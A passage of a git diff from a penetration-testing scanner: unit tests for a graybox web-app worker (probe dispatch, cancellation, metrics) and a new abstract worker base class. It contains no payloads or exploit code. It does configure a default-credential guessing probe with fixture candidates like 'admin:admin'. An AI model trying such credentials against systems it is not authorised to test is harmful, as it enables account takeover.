self.assertIn("local_worker_id", status_full) + + +class TestLifecycle(unittest.TestCase): + + def test_start_creates_thread(self): + """start() creates thread and stop_event.""" + worker = _make_worker() + # Patch execute_job to avoid actual execution + worker.execute_job = MagicMock() + worker.start() + self.assertIsNotNone(worker.thread) + self.assertIsNotNone(worker.stop_event) + worker.thread.join(timeout=1) + + def test_stop_sets_events(self): + """stop() sets stop_event and state['canceled'].""" + worker = _make_worker() + worker.execute_job = MagicMock() + worker.start() + worker.stop() + self.assertTrue(worker.stop_event.is_set()) + self.assertTrue(worker.state["canceled"]) + worker.thread.join(timeout=1) + + def test_check_stopped_after_stop(self): + """_check_stopped() returns True after stop().""" + worker = _make_worker() + worker.execute_job = MagicMock() + worker.start() + worker.stop() + self.assertTrue(worker._check_stopped()) + worker.thread.join(timeout=1) + + +class TestExecution(unittest.TestCase): + + def test_metrics_phase_timing(self): + """Phase durations populated after execute_job.""" + worker = _make_worker() + # Mock auth to succeed + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.safety.validate_target.return_value = None + + # Mock discovery + worker.discovery.discover.return_value = ([], []) + + # Mock probe registry to be empty for fast execution + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", []): + worker.execute_job() + + self.assertTrue(worker.state["done"]) + metrics = worker.metrics.build() + self.assertTrue(len(metrics.phase_durations) > 0) + + def test_worker_builds_typed_credentials(self): + worker = _make_worker(regular_username="alice", regular_password="pass", weak_candidates=["admin:admin"]) + self.assertIsInstance(worker._credentials, GrayboxCredentialSet) + self.assertEqual(worker._credentials.official.username, "admin") + self.assertEqual(worker._credentials.regular.username, "alice") + self.assertEqual(worker._credentials.weak_candidates, ["admin:admin"]) + + def test_discovery_phase_returns_typed_result(self): + worker = _make_worker() + worker.auth.ensure_sessions = MagicMock() + worker.discovery.discover_result = MagicMock(return_value=DiscoveryResult(routes=["/a"], forms=["/f"])) + + result = worker._run_discovery_phase() + + self.assertIsInstance(result, DiscoveryResult) + self.assertEqual(result.routes, ["/a"]) + + def test_discovery_phase_fails_closed_when_refresh_fails(self): + worker = _make_worker() + worker.auth.ensure_sessions = MagicMock(return_value=False) + + result = worker._run_discovery_phase() + + self.assertEqual(result, DiscoveryResult()) + self.assertIn("_graybox_fatal", worker.state["graybox_results"]["8000"]) + + def test_build_probe_context_returns_typed_context(self): + worker = _make_worker(regular_username="alice") + context = worker._build_probe_kwargs(DiscoveryResult(routes=["/r"], forms=["/f"])) + self.assertIsInstance(context, GrayboxProbeContext) + self.assertEqual(context.discovered_routes, ["/r"]) + self.assertEqual(context.discovered_forms, ["/f"]) + self.assertEqual(context.regular_username, "alice") + + def test_supported_features_come_from_typed_probe_definitions(self): + with patch( + "extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_graybox_alpha", "cls": "fake.Alpha"}], + ): + self.assertEqual( + GrayboxLocalWorker.get_supported_features(), + ["_graybox_alpha", "_graybox_weak_auth"], + ) + + def test_scenario_stats(self): + """Scenario stats count findings by status.""" + worker = _make_worker() + worker._store_findings("_test", [ + GrayboxFinding( + scenario_id="T1", title="Vuln", status="vulnerable", + severity="HIGH", owasp="A01:2021", + ), + GrayboxFinding( + scenario_id="T2", title="Clean", status="not_vulnerable", + severity="INFO", owasp="A01:2021", + ), + ]) + stats = worker._compute_scenario_stats() + self.assertEqual(stats["total"], 2) + self.assertEqual(stats["vulnerable"], 1) + self.assertEqual(stats["not_vulnerable"], 1) + + def test_registered_probe_records_auth_refresh_failure(self): + worker = _make_worker() + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth.ensure_sessions = MagicMock(return_value=False) + worker.auth._auth_errors = [] + probe_context = worker._build_probe_kwargs(DiscoveryResult()) + mock_cls = MagicMock() + mock_cls.requires_regular_session = False + mock_cls.requires_auth = True + mock_cls.is_stateful = False + + with patch.object(worker, "_import_probe", return_value=mock_cls): + worker._run_registered_probe({"key": "_graybox_test", "cls": "fake.Probe"}, probe_context) + + self.assertEqual(worker.metrics.build().probes_failed, 1) + self.assertIn("_graybox_fatal", worker.state["graybox_results"]["8000"]) + self.assertEqual(worker.metrics.build().probe_breakdown["_graybox_test"], "failed:auth_refresh") + + def test_store_findings_accepts_typed_probe_run_result(self): + worker = _make_worker() + finding = GrayboxFinding( + scenario_id="TEST-01", + title="Typed result", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + run_result = GrayboxProbeRunResult(findings=[finding], outcome="completed") + + worker._store_findings("_typed_probe", run_result) + + stored = worker.state["graybox_results"]["8000"]["_typed_probe"] + self.assertEqual(stored["outcome"], "completed") + self.assertEqual(len(stored["findings"]), 1) + + def test_store_findings_persists_typed_probe_artifacts(self): + worker = _make_worker() + finding = GrayboxFinding( + scenario_id="TEST-ART", + title="Artifact result", + status="inconclusive", + severity="INFO", + owasp="A01:2021", + ) + run_result = GrayboxProbeRunResult( + findings=[finding], + artifacts=[ + GrayboxEvidenceArtifact( + summary="GET /admin -> 403", + request_snapshot="GET /admin", + response_snapshot="403 Forbidden", + raw_evidence_cid="QmArtifact", + ), + ], + outcome="completed", + ) + + worker._store_findings("_typed_probe", run_result) + + stored = worker.state["graybox_results"]["8000"]["_typed_probe"] + self.assertEqual(stored["artifacts"][0]["summary"], "GET /admin -> 403") + self.assertEqual(stored["artifacts"][0]["raw_evidence_cid"], "QmArtifact") + + def test_registered_probe_accepts_typed_probe_definition(self): + worker = _make_worker() + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth.ensure_sessions = MagicMock(return_value=True) + worker.auth._auth_errors = [] + probe_context = worker._build_probe_kwargs(DiscoveryResult()) + finding = GrayboxFinding( + scenario_id="TEST-02", + title="Registry typed", + status="not_vulnerable", + severity="INFO", + owasp="A01:2021", + ) + mock_probe = MagicMock() + mock_probe.run.return_value = GrayboxProbeRunResult(findings=[finding], outcome="completed") + mock_cls = MagicMock(return_value=mock_probe) + mock_cls.requires_regular_session = False + mock_cls.requires_auth = True + mock_cls.is_stateful = False + + with patch.object(worker, "_import_probe", return_value=mock_cls): + worker._run_registered_probe( + GrayboxProbeDefinition(key="_typed", cls_path="fake.Probe"), + probe_context, + ) + + stored = worker.state["graybox_results"]["8000"]["_typed"] + self.assertEqual(stored["outcome"], "completed") + self.assertEqual(worker.metrics.build().probe_breakdown["_typed"], "completed") + + def test_auth_failure_aborts(self): + """Official login fails → fatal finding, done=True.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = False + worker.auth.official_session = None + worker.auth._auth_errors = ["Login failed"] + worker.auth.cleanup = MagicMock() + + worker.execute_job() + + self.assertTrue(worker.state["done"]) + results = worker.state["graybox_results"] + fatal = results.get("8000", {}).get("_graybox_fatal", {}).get("findings", []) + self.assertEqual(len(fatal), 1) + self.assertEqual(fatal[0]["status"], "inconclusive") + self.assertIn("authentication failed", fatal[0]["evidence"][0].lower()) + + def test_preflight_failure_aborts(self): + """Bad URL → fatal finding, done=True.""" + worker = _make_worker() + worker.safety.validate_target.return_value = "Target not authorized" + worker.auth.cleanup = MagicMock() + + worker.execute_job() + + self.assertTrue(worker.state["done"]) + fatal = worker.state["graybox_results"].get("8000", {}).get("_graybox_fatal", {}).get("findings", []) + self.assertEqual(len(fatal), 1) + + def test_cancel_before_discovery(self): + """Routes/forms default to [] when canceled before discovery.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.cleanup = MagicMock() + + # Cancel after auth + worker.state["canceled"] = True + + worker.execute_job() + self.assertTrue(worker.state["done"]) + + def test_cancel_stops_probes(self): + """stop() skips remaining probes.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + call_count = [0] + original_import = GrayboxLocalWorker._import_probe + + def counting_import(cls_path): + call_count[0] += 1 + if call_count[0] >= 2: + worker.state["canceled"] = True + return original_import(cls_path) + + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(counting_import)): + worker.execute_job() + + self.assertTrue(worker.state["done"]) + + def test_cleanup_always_runs(self): + """Sessions closed even on error.""" + worker = _make_worker() + worker.safety.validate_target.side_effect = RuntimeError("boom") + worker.safety.sanitize_error.return_value = "boom" + worker.auth.cleanup = MagicMock() + + worker.execute_job() + + worker.auth.cleanup.assert_called_once() + self.assertTrue(worker.state["done"]) + + +class TestProbeDispatch(unittest.TestCase): + + def test_probe_kwargs_include_forms(self): + """discovered_forms passed to probes.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = (["/route1/"], ["/form1/"]) + + probe_instances = [] + + def mock_registry_probe(**kwargs): + mock_probe = MagicMock() + mock_probe.run.return_value = [] + probe_instances.append(kwargs) + return mock_probe + + mock_cls = MagicMock(side_effect=mock_registry_probe) + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_test", "cls": "test.TestProbe"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + self.assertTrue(len(probe_instances) > 0) + self.assertEqual(probe_instances[0]["discovered_forms"], ["/form1/"]) + + def test_excluded_features_skips_probes(self): + """'graybox' in excluded → no probes run.""" + worker = _make_worker(excluded_features=["graybox"]) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch.object(GrayboxLocalWorker, '_import_probe') as mock_import: + worker.execute_job() + mock_import.assert_not_called() + + def test_excluded_probe_key_skips_only_that_probe(self): + """Per-probe exclusions suppress only the disabled graybox probe.""" + worker = _make_worker(excluded_features=["_graybox_injection"]) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + imported = [] + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls = MagicMock(return_value=mock_probe) + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + def track_import(cls_path): + imported.append(cls_path) + return mock_cls + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", [ + {"key": "_graybox_injection", "cls": "inj.Probe"}, + {"key": "_graybox_access_control", "cls": "acc.Probe"}, + ]): + with patch.object(GrayboxLocalWorker, "_import_probe", staticmethod(track_import)): + worker.execute_job() + + self.assertEqual(imported, ["acc.Probe"]) + metrics = worker.get_status()["scan_metrics"] + self.assertEqual(metrics["probe_breakdown"]["_graybox_injection"], "skipped:disabled") + self.assertEqual(metrics["probe_breakdown"]["_graybox_access_control"], "completed") + + def test_excluded_weak_auth_probe_records_skip(self): + """Weak-auth probe is skipped cleanly when disabled by feature control.""" + worker = _make_worker( + weak_candidates=["admin:admin"], + excluded_features=["_graybox_weak_auth"], + ) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.BusinessLogicProbes") as mock_probe: + worker.execute_job() + mock_probe.assert_not_called() + + metrics = worker.get_status()["scan_metrics"] + self.assertEqual(metrics["probe_breakdown"]["_graybox_weak_auth"], "skipped:disabled") + + def test_get_worker_specific_result_fields(self): + """Includes graybox_results.""" + fields = GrayboxLocalWorker.get_worker_specific_result_fields() + self.assertIn("graybox_results", fields) + self.assertEqual(fields["graybox_results"], dict) + + def test_ports_scanned_aggregation_type(self): + """ports_scanned uses list aggregation type.""" + fields = GrayboxLocalWorker.get_worker_specific_result_fields() + self.assertEqual(fields["ports_scanned"], list) + + def test_probe_error_isolation(self): + """One probe crash doesn't kill the scan.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + worker.safety.sanitize_error.return_value = "test error" + + crash_cls = MagicMock(side_effect=RuntimeError("probe crashed")) + crash_cls.is_stateful = False + crash_cls.requires_auth = False + crash_cls.requires_regular_session = False + + ok_cls = MagicMock() + ok_probe = MagicMock() + ok_probe.run.return_value = [GrayboxFinding( + scenario_id="OK-1", title="OK", status="not_vulnerable", + severity="INFO", owasp="", + )] + ok_cls.return_value = ok_probe + ok_cls.is_stateful = False + ok_cls.requires_auth = False + ok_cls.requires_regular_session = False + + imports = iter([crash_cls, ok_cls]) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_crash", "cls": "crash.CrashProbe"}, {"key": "_ok", "cls": "ok.OkProbe"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: next(imports))): + worker.execute_job() + + self.assertTrue(worker.state["done"]) + # Crash probe recorded error finding + crash_findings = worker.state["graybox_results"]["8000"]["_crash"]["findings"] + self.assertEqual(len(crash_findings), 1) + self.assertEqual(crash_findings[0]["status"], "inconclusive") + # OK probe still ran + ok_findings = worker.state["graybox_results"]["8000"]["_ok"]["findings"] + self.assertEqual(len(ok_findings), 1) + metrics = worker.get_status()["scan_metrics"] + self.assertEqual(metrics["probe_breakdown"]["_crash"], "failed") + self.assertEqual(metrics["probe_breakdown"]["_ok"], "completed") + self.assertEqual(metrics["probes_failed"], 1) + self.assertEqual(metrics["probes_completed"], 1) + + def test_probe_error_records_finding(self): + """Crashed probe emits inconclusive finding.""" + worker = _make_worker() + worker.safety.sanitize_error.return_value = "sanitized error" + worker._record_probe_error("_test_probe", RuntimeError("fail")) + findings = worker.state["graybox_results"]["8000"]["_test_probe"]["findings"] + self.assertEqual(len(findings), 1) + self.assertEqual(findings[0]["status"], "inconclusive") + self.assertIn("sanitized error", findings[0]["evidence"][0]) + + def test_verify_tls_false_emits_warning(self): + """TLS disabled → preflight finding.""" + worker = _make_worker(verify_tls=False) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", []): + worker.execute_job() + + preflight = worker.state["graybox_results"]["8000"].get("_graybox_preflight", {}).get("findings", []) + self.assertEqual(len(preflight), 1) + self.assertEqual(preflight[0]["scenario_id"], "PREFLIGHT-TLS") + self.assertEqual(preflight[0]["severity"], "LOW") + + def test_probe_registry_iteration(self): + """Probes loaded from GRAYBOX_PROBE_REGISTRY.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + imported_paths = [] + + def tracking_import(cls_path): + imported_paths.append(cls_path) + mock_cls = MagicMock() + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls.return_value = mock_probe + return mock_cls + + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(tracking_import)): + worker.execute_job() + + # Should have imported all registry entries + expected = [entry["cls"] for entry in GRAYBOX_PROBE_REGISTRY] + self.assertEqual(imported_paths, expected) + + def test_capability_introspection(self): + """Worker reads probe_cls.is_stateful, not registry dict.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + mock_cls = MagicMock() + mock_cls.is_stateful = True # Stateful + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls.return_value = mock_probe + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_stateful", "cls": "test.StatefulProbe"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + # Probe was skipped (stateful disabled by default) + skip = worker.state["graybox_results"]["8000"].get("_stateful", {}).get("findings", []) + self.assertEqual(len(skip), 1) + self.assertEqual(skip[0]["status"], "inconclusive") + self.assertIn("stateful_probes_disabled", skip[0]["evidence"][0]) + + def test_capability_skip_no_regular(self): + """Probe requiring regular_session skipped when no regular session.""" + worker = _make_worker() + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = None # No regular session + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + mock_cls = MagicMock() + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = True + mock_probe = MagicMock() + mock_probe.run.return_value = [] + mock_cls.return_value = mock_probe + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_needs_regular", "cls": "test.NeedsRegular"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + # Probe was silently skipped (no finding, no error) + self.assertNotIn("_needs_regular", worker.state["graybox_results"].get("8000", {})) + + def test_capability_skip_stateful(self): + """Stateful probe emits skip finding when disabled.""" + worker = _make_worker(allow_stateful_probes=False) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + mock_cls = MagicMock() + mock_cls.is_stateful = True + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", + [{"key": "_stateful_probe", "cls": "test.Stateful"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cls_path: mock_cls)): + worker.execute_job() + + skip = worker.state["graybox_results"]["8000"].get("_stateful_probe", {}).get("findings", []) + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0]["evidence"]) + + def test_import_probe(self): + """_import_probe resolves cls_path to class.""" + cls = GrayboxLocalWorker._import_probe("access_control.AccessControlProbes") + from extensions.business.cybersec.red_mesh.graybox.probes.access_control import AccessControlProbes + self.assertIs(cls, AccessControlProbes) + + def test_weak_auth_direct_import(self): + """BusinessLogicProbes used directly for weak auth, not via registry.""" + worker = _make_worker(weak_candidates=["admin:admin"]) + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = MagicMock() + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + with patch("extensions.business.cybersec.red_mesh.graybox.worker.GRAYBOX_PROBE_REGISTRY", []): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.BusinessLogicProbes") as mock_bl: + mock_instance = MagicMock() + mock_instance.run_weak_auth.return_value = [] + mock_bl.return_value = mock_instance + worker.execute_job() + + mock_bl.assert_called_once() + mock_instance.run_weak_auth.assert_called_once() + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/web_mixin.py b/extensions/business/cybersec/red_mesh/web_mixin.py deleted file mode 100644 index 61b2dcc5..00000000 --- a/extensions/business/cybersec/red_mesh/web_mixin.py +++ /dev/null @@ -1,14 +0,0 @@ -from .web_discovery_mixin import _WebDiscoveryMixin -from .web_hardening_mixin import _WebHardeningMixin -from .web_api_mixin import _WebApiExposureMixin -from .web_injection_mixin import _WebInjectionMixin - - -class _WebTestsMixin( - _WebDiscoveryMixin, - _WebHardeningMixin, - _WebApiExposureMixin, - _WebInjectionMixin, -): - """Backward-compatible combined mixin -- prefer importing individual mixins.""" - pass diff --git a/extensions/business/cybersec/red_mesh/worker/__init__.py b/extensions/business/cybersec/red_mesh/worker/__init__.py new file mode 100644 index 00000000..91477511 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/__init__.py @@ -0,0 +1,5 @@ +from .base import BaseLocalWorker +from .pentest_worker import PentestLocalWorker +from .metrics_collector import MetricsCollector + +__all__ = ["BaseLocalWorker", "PentestLocalWorker", "MetricsCollector"] diff --git a/extensions/business/cybersec/red_mesh/worker/base.py b/extensions/business/cybersec/red_mesh/worker/base.py new file mode 100644 index 00000000..7abc8aef --- /dev/null +++ b/extensions/business/cybersec/red_mesh/worker/base.py @@ -0,0 +1,197 @@ +""" +Abstract base for all RedMesh scan workers. + +Defines the contract that pentester_api_01.py relies on: +threading model, state shape, status reporting, and metrics. +PentestLocalWorker (network) and GrayboxLocalWorker (webapp) both +inherit from this class. +""" + +import threading +import uuid +from abc import ABC, abstractmethod + +from .metrics_collector import MetricsCollector + + +class BaseLocalWorker(ABC): + """ + Abstract base class for scan workers. + + Subclasses MUST: + - Call super().__init__() to initialize shared state + - Implement execute_job() with the scan pipeline + - Implement get_status() for aggregation + - Implement get_worker_specific_result_fields() for aggregation + - Set self.initial_ports in __init__ before start() is called + - Initialize self.state with at minimum the required keys (see below) + + The API (pentester_api_01.py) accesses: + - self.thread.is_alive() to check completion + - self.stop_event.is_set() to check cancellation + - self.state["done"] / self.state["canceled"] for status + - self.initiator for job routing + - self.local_worker_id as dict key in scan_jobs + - self.initial_ports for port count in progress + - self.metrics.build().to_dict() for live metrics + - self.get_status() for report aggregation + - self.start() / self.stop() for lifecycle + + State dict required keys (subclass must include all of these): + done: bool, canceled: bool, open_ports: list[int], + ports_scanned: list[int], completed_tests: list[str], + service_info: dict, web_tests_info: dict, port_protocols: dict, + correlation_findings: list + """ + + def __init__( + self, + owner, + job_id: str, + initiator: str, + local_id_prefix: str, + target: str, + ): + """ + Initialize shared worker state. + + Parameters + ---------- + owner : object + Parent object providing logger P(). + job_id : str + Job identifier. + initiator : str + Network address that announced the job. + local_id_prefix : str + Prefix for human-readable worker ID. The full ID is + "RM-{prefix}-{uuid4[:4]}" and is used as the dict key in + scan_jobs[job_id]. Both PentestLocalWorker and + GrayboxLocalWorker use this same attribute name. + target : str + Scan target (IP for network, hostname for webapp). + """ + self.owner = owner + self.job_id = job_id + self.initiator = initiator + self.target = target + self.local_worker_id = "RM-{}-{}".format( + local_id_prefix, str(uuid.uuid4())[:4] + ) + + # Threading — set by start(), checked by API + self.thread: threading.Thread | None = None + self.stop_event: threading.Event | None = None + + # Metrics — accessed by _publish_live_progress via + # worker.metrics.build().to_dict() + self.metrics = MetricsCollector() + + # Subclass MUST set self.initial_ports in __init__ before start(). + # _publish_live_progress reads len(self.initial_ports). + self.initial_ports: list[int] = [] + + # Subclass MUST initialize self.state with at minimum the required keys. + # The base class does NOT pre-populate — each subclass builds its + # own state dict with scan-type-specific keys on top of these. + self.state: dict = {} + + def start(self): + """ + Create thread and stop_event, start execute_job in background. + + Called by pentester_api_01.py after construction. + """ + self.stop_event = threading.Event() + self.thread = threading.Thread(target=self.execute_job, daemon=True) + self.thread.start() + + def stop(self): + """ + Signal the worker to stop. + + Called by _check_running_jobs, stop_and_delete_job, hard stop. + Sets stop_event so _check_stopped() returns True. + Also sets state["canceled"] for backward compat with code that + reads the flag directly instead of checking stop_event. + + Ordering guarantee: stop_event is set BEFORE state["canceled"]. + This ensures _check_stopped() sees the stop signal even if + there's a context switch between the two assignments. The GIL + makes dict writes atomic, so state["canceled"] is always + consistent. + """ + self.P(f"Stop requested for job {self.job_id} on worker {self.local_worker_id}") + if self.stop_event: + self.stop_event.set() + self.state["canceled"] = True + + def _check_stopped(self) -> bool: + """ + Check whether the worker should cease execution. + + Returns True if done or stop_event is set or canceled flag is set. + Subclasses call this between phases to support graceful cancellation. + """ + if self.state.get("done", False): + return True + if self.state.get("canceled", False): + return True + if self.stop_event is not None and self.stop_event.is_set(): + return True + return False + + @abstractmethod + def execute_job(self) -> None: + """ + Run the scan pipeline. Called on the worker thread. + + Subclass MUST: + - Set self.state["done"] = True when finished (in finally block) + - Set self.state["canceled"] = True if _check_stopped() was True + - Call self.metrics.start_scan() at the beginning + - Call self.metrics.phase_start/phase_end for each phase + - Append phase markers to self.state["completed_tests"] + """ + ... + + @abstractmethod + def get_status(self, for_aggregations: bool = False) -> dict: + """ + Return a status snapshot for aggregation. + + Called by _maybe_close_jobs, _close_job, get_test_status. + + The returned dict MUST include: + - job_id, initiator, target + - open_ports (list), ports_scanned, completed_tests (list) + - service_info (dict), web_tests_info (dict), port_protocols (dict) + - correlation_findings (list) + - scan_metrics (dict from self.metrics.build().to_dict()) + + If not for_aggregations: + - local_worker_id, progress, done, canceled + """ + ... + + @staticmethod + @abstractmethod + def get_worker_specific_result_fields() -> dict: + """ + Define aggregation strategy per result field. + + Called by _get_aggregated_report to know how to merge results + from multiple workers of the same job. + + Returns dict mapping field name to aggregation type/callable: + - list: union (deduplicate + sort) + - dict: deep merge + - sum: sum values + - min/max: take min/max + """ + ... + + def P(self, s, **kwargs): + """Log a message with worker context prefix.""" + s = f"[{self.local_worker_id}:{self.target}] {s}" + self.owner.P(s, **kwargs) diff --git a/extensions/business/cybersec/red_mesh/correlation_mixin.py b/extensions/business/cybersec/red_mesh/worker/correlation.py similarity index 99% rename from extensions/business/cybersec/red_mesh/correlation_mixin.py rename to extensions/business/cybersec/red_mesh/worker/correlation.py index 1f77d97c..d79c99d4 100644 --- a/extensions/business/cybersec/red_mesh/correlation_mixin.py +++ b/extensions/business/cybersec/red_mesh/worker/correlation.py @@ -8,7 +8,7 @@ import ipaddress -from .findings import Finding, Severity, probe_result +from ..findings import Finding, Severity, probe_result # Map keywords found in OS strings to normalized OS families diff --git a/extensions/business/cybersec/red_mesh/metrics_collector.py b/extensions/business/cybersec/red_mesh/worker/metrics_collector.py similarity index 98% rename from extensions/business/cybersec/red_mesh/metrics_collector.py rename to extensions/business/cybersec/red_mesh/worker/metrics_collector.py index 1f0295a7..77ef3af2 100644 --- a/extensions/business/cybersec/red_mesh/metrics_collector.py +++ b/extensions/business/cybersec/red_mesh/worker/metrics_collector.py @@ -1,7 +1,7 @@ import time import statistics -from .models.shared import ScanMetrics +from ..models.shared import ScanMetrics class MetricsCollector: @@ -160,7 +160,7 @@ def build(self) -> ScanMetrics: probes_attempted = len(self._probe_results) probes_completed = sum(1 for v in self._probe_results.values() if v == "completed") probes_skipped = sum(1 for v in self._probe_results.values() if v.startswith("skipped")) - probes_failed = sum(1 for v in self._probe_results.values() if v == "failed") + probes_failed = sum(1 for v in self._probe_results.values() if v == "failed" or v.startswith("failed:")) banner_total = self._banner_confirmed + self._banner_guessed return ScanMetrics( diff --git a/extensions/business/cybersec/red_mesh/pentest_worker.py b/extensions/business/cybersec/red_mesh/worker/pentest_worker.py similarity index 85% rename from extensions/business/cybersec/red_mesh/pentest_worker.py rename to extensions/business/cybersec/red_mesh/worker/pentest_worker.py index caa51f9c..4b76d669 100644 --- a/extensions/business/cybersec/red_mesh/pentest_worker.py +++ b/extensions/business/cybersec/red_mesh/worker/pentest_worker.py @@ -7,25 +7,43 @@ import traceback import time -from .service_mixin import _ServiceInfoMixin -from .correlation_mixin import _CorrelationMixin -from .constants import ( +from .base import BaseLocalWorker +from .service import _ServiceInfoMixin +from .correlation import _CorrelationMixin +from ..constants import ( PROBE_PROTOCOL_MAP, WEB_PROTOCOLS, WELL_KNOWN_PORTS as _WELL_KNOWN_PORTS, FINGERPRINT_TIMEOUT, FINGERPRINT_MAX_BANNER, 